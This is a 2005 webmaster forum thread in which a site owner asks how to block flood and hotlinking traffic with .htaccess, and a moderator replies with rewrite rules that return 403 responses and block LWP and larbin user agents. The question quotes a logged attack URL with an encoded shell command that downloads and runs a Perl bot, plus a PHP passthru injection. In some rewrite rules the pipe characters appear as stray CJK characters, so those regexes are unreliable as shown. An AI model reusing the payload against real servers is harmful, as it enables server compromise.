Forum Moderators: phranque
we have education site, last 3 weeks we faced lots of flood attacks.
we decide to put hotlink protection to our php pages with this lines on .htaccess file
RewriteRule .*\.(jpg夸peg夙if如ng在mp如hp)$ [mysite.com...]
in this way we try to transfer requests with no referer to a light page (index.html)
my firs question is it ok to do like this?
after that thousands of flood logs logged looking like this.
***.*.***.** - - [14/Jan/2005:05:46:58 -0600] "POST /index.php HTTP/1.0" 302 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; .NET CLR 1.0.3705)"
by doing this our server overload is decreased.
is there a way to recognize the flood attack and get prevention?
My second question
I want to allow at least alexa and google search bots to search my sites every pages. how can i do that with htaccess file.
Also requests with specific referer can access my site. for example
www.google.com
one more demand with this log
193.158.85.100 - - [02/Jan/2005:22:52:02 -0600] "GET /viewtopic.php?t=285&rush=%65%63%68%6F%20%5F%53%54
%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20
[example.org...]
ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=
%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
HTTP/1.1" 302 880 "-" "LWP::Simple/5.64"
how can i disallow (not transfer to other page) request if it has "rush" word in its request.
Maybe all this questions has very easy answers but we have to hurry before our site overload and suspended again.
Thanks a lot in advance.
[edited by: jdMorgan at 6:33 pm (utc) on Jan. 24, 2005]
[edit reason] Removed specifics, Fixed formatting. [/edit]
Welcome to WebmasterWorld!
This is a deep subject area, and we have hundreds of threads about hotlinking here. Even though you are in a hurry, reading some of these threads [google.com] will save you a lot of time and wasted effort.
To save bandwidth, don't redirect hotlinkers to another page. This results in *another* request to your server! Instead, just return a 403-Forbidden response. Make sure your custom 403 error page (if you have one) is very short. Example:
# block external referrers unless blank (allow search robots, corporate and ISP proxies)
RewriteCond %{HTTP_REFERER} .
RewriteCond %{HTTP_REFERER} !^http://(www\.)?yoursite\.com [NC]
RewriteRule \.(gif夸pe?g如ng在mp)$ - [NC,F]
#
# Block site downloaders
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} larbin [NC]
RewriteRule .* - [F]